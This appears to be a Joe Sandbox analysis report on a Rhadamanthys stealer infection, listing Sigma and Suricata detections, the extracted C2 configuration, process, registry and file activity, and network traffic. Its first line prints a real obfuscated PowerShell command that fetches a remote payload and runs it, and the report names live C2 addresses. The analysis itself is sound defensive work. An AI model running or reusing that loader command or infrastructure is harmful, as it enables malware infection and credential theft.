"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;, ProcessId: 4352, ProcessName: powershell.exe
                      Sigma detected: Windows Processes Suspicious Parent Directory
                      Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentProcessId: 1852, ParentProcessName: RegSvcs.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 8420, ProcessName: svchost.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-03-17T21:39:37.676733+010020283713Unknown Traffic192.168.11.304980923.192.229.107443TCP
                      2025-03-17T21:40:41.179922+010020283713Unknown Traffic192.168.11.304985023.192.229.107443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-03-17T21:39:36.358712+010020479051A Network Trojan was detected192.168.11.304980774.125.138.132443TCP
                      2025-03-17T21:39:56.354017+010020479051A Network Trojan was detected192.168.11.304981764.233.185.132443TCP
                      2025-03-17T21:40:10.716194+010020479051A Network Trojan was detected192.168.11.304982264.233.185.132443TCP
                      2025-03-17T21:40:27.202744+010020479051A Network Trojan was detected192.168.11.304984264.233.185.132443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-03-17T21:40:23.832179+010028548242Potentially Bad Traffic185.208.159.1702484192.168.11.3049834TCP
                      2025-03-17T21:40:33.588363+010028548242Potentially Bad Traffic185.208.159.1702484192.168.11.3049849TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-03-17T21:39:36.358712+010028032742Potentially Bad Traffic192.168.11.304980774.125.138.132443TCP
                      2025-03-17T21:39:56.354017+010028032742Potentially Bad Traffic192.168.11.304981764.233.185.132443TCP
                      2025-03-17T21:40:10.716194+010028032742Potentially Bad Traffic192.168.11.304982264.233.185.132443TCP
                      2025-03-17T21:40:27.202744+010028032742Potentially Bad Traffic192.168.11.304984264.233.185.132443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-03-17T21:40:00.669129+010028548021Domain Observed Used for C2 Detected185.208.159.1702484192.168.11.3049819TCP
                      2025-03-17T21:40:23.832179+010028548021Domain Observed Used for C2 Detected185.208.159.1702484192.168.11.3049834TCP
                      2025-03-17T21:40:33.588363+010028548021Domain Observed Used for C2 Detected185.208.159.1702484192.168.11.3049849TCP
                      2025-03-17T21:40:43.092320+010028548021Domain Observed Used for C2 Detected185.208.159.170443192.168.11.3049851TCP
                      2025-03-17T21:40:46.167178+010028548021Domain Observed Used for C2 Detected185.208.159.1702484192.168.11.3049852TCP
                      2025-03-17T21:40:49.673981+010028548021Domain Observed Used for C2 Detected185.208.159.170443192.168.11.3049853TCP
                      2025-03-17T21:40:56.464174+010028548021Domain Observed Used for C2 Detected185.208.159.170443192.168.11.3049855TCP
                      2025-03-17T21:41:03.043213+010028548021Domain Observed Used for C2 Detected185.208.159.170443192.168.11.3049856TCP
                      2025-03-17T21:41:09.639230+010028548021Domain Observed Used for C2 Detected185.208.159.170443192.168.11.3049857TCP
                      2025-03-17T21:41:16.229226+010028548021Domain Observed Used for C2 Detected185.208.159.170443192.168.11.3049858TCP
                      2025-03-17T21:41:22.820962+010028548021Domain Observed Used for C2 Detected185.208.159.170443192.168.11.3049859TCP
                      2025-03-17T21:41:29.411574+010028548021Domain Observed Used for C2 Detected185.208.159.170443192.168.11.3049860TCP
                      2025-03-17T21:41:36.021500+010028548021Domain Observed Used for C2 Detected185.208.159.170443192.168.11.3049861TCP
                      2025-03-17T21:41:42.610407+010028548021Domain Observed Used for C2 Detected185.208.159.170443192.168.11.3049862TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-03-17T21:39:35.678841+010018100002Potentially Bad Traffic192.168.11.304980674.125.138.132443TCP
                      2025-03-17T21:39:36.358712+010018100002Potentially Bad Traffic192.168.11.304980774.125.138.132443TCP
                      2025-03-17T21:39:37.518727+010018100002Potentially Bad Traffic192.168.11.3049808104.192.142.25443TCP
                      2025-03-17T21:39:55.827928+010018100002Potentially Bad Traffic192.168.11.304981564.233.185.132443TCP
                      2025-03-17T21:39:56.354017+010018100002Potentially Bad Traffic192.168.11.304981764.233.185.132443TCP
                      2025-03-17T21:40:10.166328+010018100002Potentially Bad Traffic192.168.11.304982164.233.185.132443TCP
                      2025-03-17T21:40:10.716194+010018100002Potentially Bad Traffic192.168.11.304982264.233.185.132443TCP
                      2025-03-17T21:40:26.521649+010018100002Potentially Bad Traffic192.168.11.304983864.233.185.132443TCP
                      2025-03-17T21:40:27.202744+010018100002Potentially Bad Traffic192.168.11.304984264.233.185.132443TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 00000008.00000002.289414109956.0000000002FA1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Rhadamanthys {"C2 url": "https://185.208.159.170:2484/38d2415e410113/9do988c8.3o15p"}
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586D6B88 CryptUnprotectData,27_2_00007DF4586D6B88
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DA3838 CryptProtectData,CreateFileW,WriteFile,CloseHandle,free,50_3_00007DF423DA3838
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DA3838 CryptProtectData,CreateFileW,WriteFile,CloseHandle,free,50_3_00007DF423DA3838
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B9A6B60 CryptQueryObject,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertCloseStore,52_2_6B9A6B60
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B9A6960 CryptHashCertificate,52_2_6B9A6960
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA08EEC zip_fopen_index,zip_fopen_index_encrypted,52_2_6BA08EEC
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA04312 CryptAcquireContextW,GetLastError,CryptReleaseContext,52_2_6BA04312
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B93A591 CryptReleaseContext,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,52_2_6B93A591
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B9A592F CryptVerifySignatureW,CryptDestroyHash,CryptDestroyKey,52_2_6B9A592F
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B9A58C9 CryptHashData,52_2_6B9A58C9
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B9A570A CryptDecodeObjectEx,CryptImportPublicKeyInfo,CryptCreateHash,52_2_6B9A570A
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA0D76E zip_fopen_index_encrypted,zip_source_open,zip_source_free,52_2_6BA0D76E
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B98552C SafeArrayGetLBound,CryptUnprotectData,GetLastError,LocalFree,52_2_6B98552C
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0BE67C CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,52_2_7F0BE67C
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0B4FA6 memset,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,52_2_7F0B4FA6
                      Source: svchost.exe, 0000001B.00000003.289571585197.0000018CD6010000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_ae6b028d-2
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
                      Source: unknownHTTPS traffic detected: 74.125.138.132:443 -> 192.168.11.30:49806 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 150.171.27.12:443 -> 192.168.11.30:49805 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.192.142.25:443 -> 192.168.11.30:49808 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 23.192.229.107:443 -> 192.168.11.30:49809 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 64.233.185.132:443 -> 192.168.11.30:49815 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 64.233.185.132:443 -> 192.168.11.30:49821 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 64.233.185.132:443 -> 192.168.11.30:49838 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 23.192.229.107:443 -> 192.168.11.30:49850 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.208.159.170:443 -> 192.168.11.30:49851 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.208.159.170:443 -> 192.168.11.30:49853 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.208.159.170:443 -> 192.168.11.30:49855 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.208.159.170:443 -> 192.168.11.30:49856 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.208.159.170:443 -> 192.168.11.30:49857 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.208.159.170:443 -> 192.168.11.30:49858 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.208.159.170:443 -> 192.168.11.30:49859 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.208.159.170:443 -> 192.168.11.30:49860 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.208.159.170:443 -> 192.168.11.30:49861 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.208.159.170:443 -> 192.168.11.30:49861 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.208.159.170:443 -> 192.168.11.30:49862 version: TLS 1.2
                      Source: Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdb source: elevation_service.exe, 00000022.00000002.289639624751.00007FF652B16000.00000002.00000001.01000000.00000012.sdmp, elevation_service.exe, 00000022.00000000.289636577659.00007FF652B16000.00000002.00000001.01000000.00000012.sdmp
                      Source: Binary string: wkernel32.pdb source: svchost.exe, 00000013.00000003.289414994151.0000000005320000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.289414786038.0000000005200000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdb source: svchost.exe, 00000013.00000003.289415524202.0000000005200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.289416235563.0000000005420000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: svchost.exe, 00000013.00000003.289411881417.0000000005200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.289412522901.00000000053F0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000021.00000003.289635046903.0000022D0CFF0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000021.00000003.289634553663.0000022D0CE00000.00000004.00000001.00020000.00000000.sdmp, msedge.exe, 00000026.00000003.289666544287.00000217CE5E0000.00000004.00000001.00020000.00000000.sdmp, msedge.exe, 00000026.00000003.289667109372.00000217CE7D0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000013.00000003.289413502649.0000000005200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.289414086820.00000000053A0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: svchost.exe, 00000013.00000003.289411881417.0000000005200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.289412522901.00000000053F0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000021.00000003.289635046903.0000022D0CFF0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000021.00000003.289634553663.0000022D0CE00000.00000004.00000001.00020000.00000000.sdmp, msedge.exe, 00000026.00000003.289666544287.00000217CE5E0000.00000004.00000001.00020000.00000000.sdmp, msedge.exe, 00000026.00000003.289667109372.00000217CE7D0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: svchost.exe, 00000013.00000003.289413502649.0000000005200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.289414086820.00000000053A0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdbOGP source: elevation_service.exe, 00000022.00000002.289639624751.00007FF652B16000.00000002.00000001.01000000.00000012.sdmp, elevation_service.exe, 00000022.00000000.289636577659.00007FF652B16000.00000002.00000001.01000000.00000012.sdmp
                      Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_elf.dll.pdb source: msedge.exe, 00000026.00000002.289674194363.00007FFB6AFC5000.00000002.00000001.01000000.00000015.sdmp
                      Source: Binary string: AvastBrowserUpdate_unsigned.pdb source: AvastBrowserUpdate.exe
                      Source: Binary string: wkernelbase.pdbUGP source: svchost.exe, 00000013.00000003.289415524202.0000000005200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.289416235563.0000000005420000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdbUGP source: svchost.exe, 00000013.00000003.289414994151.0000000005320000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.289414786038.0000000005200000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_elf.dll.pdbOGP source: msedge.exe, 00000026.00000002.289674194363.00007FFB6AFC5000.00000002.00000001.01000000.00000015.sdmp
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586D1618 calloc,FindFirstFileW,DeleteFileW,FindNextFileW,RemoveDirectoryW,27_2_00007DF4586D1618
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_00FEC126 FindFirstFileExW,52_2_00FEC126
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B926118 FindFirstFileW,FindClose,FindNextFileW,52_2_6B926118
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B8F7A07 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,FindClose,RemoveDirectoryW,52_2_6B8F7A07
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B8F78C0 FindFirstFileW,GetLastError,DeleteFileW,FindNextFileW,GetLastError,FindClose,52_2_6B8F78C0
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B9392EE FindFirstFileW,GetLastError,PathStripPathW,PathStripPathW,PathStripPathW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,FindNextFileW,GetLastError,FindClose,52_2_6B9392EE
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B8F7789 FindFirstFileW,FindNextFileW,GetLastError,FindClose,52_2_6B8F7789
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B8FD6DE FindFirstFileW,FindNextFileW,FindClose,52_2_6B8FD6DE
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B8F9507 FindFirstFileW,FindNextFileW,FindClose,52_2_6B8F9507
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B91944D FindFirstFileW,FindNextFileW,FindClose,52_2_6B91944D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_05B778D9 GetLogicalDriveStringsW,QueryDosDeviceW,7_2_05B778D9
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local

                      Software Vulnerabilities

                      barindex
                      Suspicious execution chain found
                      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Source: C:\Windows\System32\svchost.exeCode function: 4x nop then dec esp27_2_0000018CD28F0511
                      Source: C:\Windows\System32\svchost.exeCode function: 4x nop then dec esp27_2_00007DF4586E25B1
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 4x nop then dec esp33_2_0000022D0AE425B1
                      Source: chrome.exeMemory has grown: Private usage: 1MB later: 27MB

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.208.159.170:2484 -> 192.168.11.30:49819
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.208.159.170:2484 -> 192.168.11.30:49849
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.208.159.170:443 -> 192.168.11.30:49851
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.208.159.170:2484 -> 192.168.11.30:49834
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.208.159.170:2484 -> 192.168.11.30:49852
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.208.159.170:443 -> 192.168.11.30:49856
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.208.159.170:443 -> 192.168.11.30:49853
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.208.159.170:443 -> 192.168.11.30:49861
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.208.159.170:443 -> 192.168.11.30:49862
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.208.159.170:443 -> 192.168.11.30:49857
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.208.159.170:443 -> 192.168.11.30:49855
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.208.159.170:443 -> 192.168.11.30:49860
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.208.159.170:443 -> 192.168.11.30:49858
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.208.159.170:443 -> 192.168.11.30:49859
                      Source: Network trafficSuricata IDS: 2047905 - Severity 1 - ET MALWARE Observed Malicious Powershell Loader Payload Request (GET) : 192.168.11.30:49807 -> 74.125.138.132:443
                      Source: Network trafficSuricata IDS: 2047905 - Severity 1 - ET MALWARE Observed Malicious Powershell Loader Payload Request (GET) : 192.168.11.30:49822 -> 64.233.185.132:443
                      Source: Network trafficSuricata IDS: 2047905 - Severity 1 - ET MALWARE Observed Malicious Powershell Loader Payload Request (GET) : 192.168.11.30:49817 -> 64.233.185.132:443
                      Source: Network trafficSuricata IDS: 2047905 - Severity 1 - ET MALWARE Observed Malicious Powershell Loader Payload Request (GET) : 192.168.11.30:49842 -> 64.233.185.132:443
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.208.159.170 2484
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: https://185.208.159.170:2484/38d2415e410113/9do988c8.3o15p
                      Source: global trafficTCP traffic: 192.168.11.30:49819 -> 185.208.159.170:2484
                      Source: Joe Sandbox ViewIP Address: 94.198.159.10 94.198.159.10
                      Source: Joe Sandbox ViewIP Address: 169.229.128.134 169.229.128.134
                      Source: Joe Sandbox ViewIP Address: 193.171.23.163 193.171.23.163
                      Source: Joe Sandbox ViewIP Address: 162.159.200.123 162.159.200.123
                      Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                      Source: Joe Sandbox ViewJA3 fingerprint: caec7ddf6889590d999d7ca1b76373b6
